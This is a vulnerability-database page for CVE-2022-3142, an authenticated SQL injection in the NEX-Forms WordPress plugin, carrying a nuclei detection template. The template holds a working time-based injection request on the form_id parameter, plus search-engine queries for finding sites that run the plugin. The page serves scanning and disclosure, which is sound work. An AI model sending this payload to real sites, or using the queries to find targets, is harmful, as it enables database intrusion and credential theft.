Lucene search
K

NEX-Forms Plugin < 7.9.7 - SQL Injection

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 36 Views

NEX-Forms Plugin < 7.9.7 SQL Injection, high severity, allows authenticated users to execute SQL injections via forms statistics chart

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress NEX-Forms plugin < 7.9.7 - Authenticated SQL injection Vulnerability
27 Mar 202300:00
zdt
ATTACKERKB
CVE-2022-3142
19 Sep 202214:15
attackerkb
Circl
CVE-2022-3142
19 Sep 202218:38
circl
CNNVD
WordPress plugin NEX-Forms SQL注入漏洞
19 Sep 202200:00
cnnvd
CVE
CVE-2022-3142
19 Sep 202200:00
cve
Cvelist
CVE-2022-3142 NEX-Forms < 7.9.7 - Authenticated SQLi
19 Sep 202200:00
cvelist
Exploit DB
NEX-Forms WordPress plugin &lt; 7.9.7 - Authenticated SQLi
25 Mar 202300:00
exploitdb
NVD
CVE-2022-3142
19 Sep 202214:15
nvd
OSV
CVE-2022-3142
19 Sep 202214:15
osv
Packet Storm
WordPress NEX-Forms SQL Injection
27 Mar 202300:00
packetstorm
Rows per page
id: CVE-2022-3142

info:
  name: NEX-Forms Plugin < 7.9.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
  impact: |
    Authenticated attackers with form statistics viewing permissions can execute SQL injection through the form_id parameter to extract the complete WordPress database including user credentials, email addresses, and sensitive site data.
  remediation: Fixed in version 7.9.7
  reference:
    - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
    - https://www.exploit-db.com/exploits/51042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3142
    - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html
    - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3142
    cwe-id: CWE-89
    epss-score: 0.1027
    epss-percentile: 0.95101
    cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: basixonline
    product: nex-forms
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/
    fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/
    publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/
  tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_2 == 200'
          - 'contains(body_2, "NEX-Forms")'
          - 'contains(content_type_2, "text/html")'
        condition: and
# digest: 4b0a00483046022100871b4f0bf098aaf4970d1a699e8fd761ad5822c8f41bf096a7823d9bd55bfa3a022100e6445a4fae20160bcab9e7d5a785449c22bb111f390cdb27483ab777ab80722a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
EPSS0.1027
36